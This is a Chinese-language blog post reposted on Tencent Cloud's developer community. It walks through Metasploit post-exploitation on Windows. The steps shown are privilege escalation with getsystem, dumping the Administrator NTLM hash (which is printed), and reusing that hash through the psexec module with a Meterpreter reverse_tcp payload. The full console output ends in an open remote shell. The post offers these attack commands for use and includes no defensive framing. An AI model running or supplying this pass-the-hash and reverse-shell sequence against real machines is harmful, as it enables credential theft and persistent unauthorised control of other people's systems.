前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >msfconsole权限维持

msfconsole权限维持

作者头像
逍遥子大表哥
发布2021-12-17 14:14:43
6670
发布2021-12-17 14:14:43
举报
文章被收录于专栏:kali blog

获取管理员hash

获得shell后,执行命令

代码语言:javascript
复制
getsystem

提高权限为管理员权限,接着执行命令

代码语言:javascript
复制
run post/windows/gather/hashdump

获取hash

Administrator:500:aad3b435b51404eeaad3b435b51404ee:bd75068c6729aacd2fe3497b43bb664e:::

权限维持

执行命令

代码语言:javascript
复制
use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.232.129
set LPORT 443
set RHOST 192.168.232.204
set SMBUser Administrator
show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOST                 192.168.232.204  yes       The target address
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBUser               Administrator    no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.232.129  yes       The listen address (an interface may be specified)
   LPORT     443              yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:bd75068c6729aacd2fe3497b43bb664e
SMBPass => aad3b435b51404eeaad3b435b51404ee:bd75068c6729aacd2fe3497b43bb664e
msf exploit(windows/smb/psexec) > exploit

[*] Started reverse TCP handler on 192.168.232.129:443 
[*] 192.168.232.204:445 - Connecting to the server...
[*] 192.168.232.204:445 - Authenticating to 192.168.232.204:445 as user 'Administrator'...
[*] 192.168.232.204:445 - Selecting PowerShell target
[*] 192.168.232.204:445 - Executing the payload...
[+] 192.168.232.204:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (179779 bytes) to 192.168.232.204
[*] Meterpreter session 1 opened (192.168.232.129:443 -> 192.168.232.204:5231) at 2018-07-03 19:26:26 +0800

meterpreter > 

成功得到反弹

版权属于:逍遥子大表哥

本文链接:https://cloud.tencent.com/developer/article/1920572

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 获取管理员hash
  • 权限维持
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档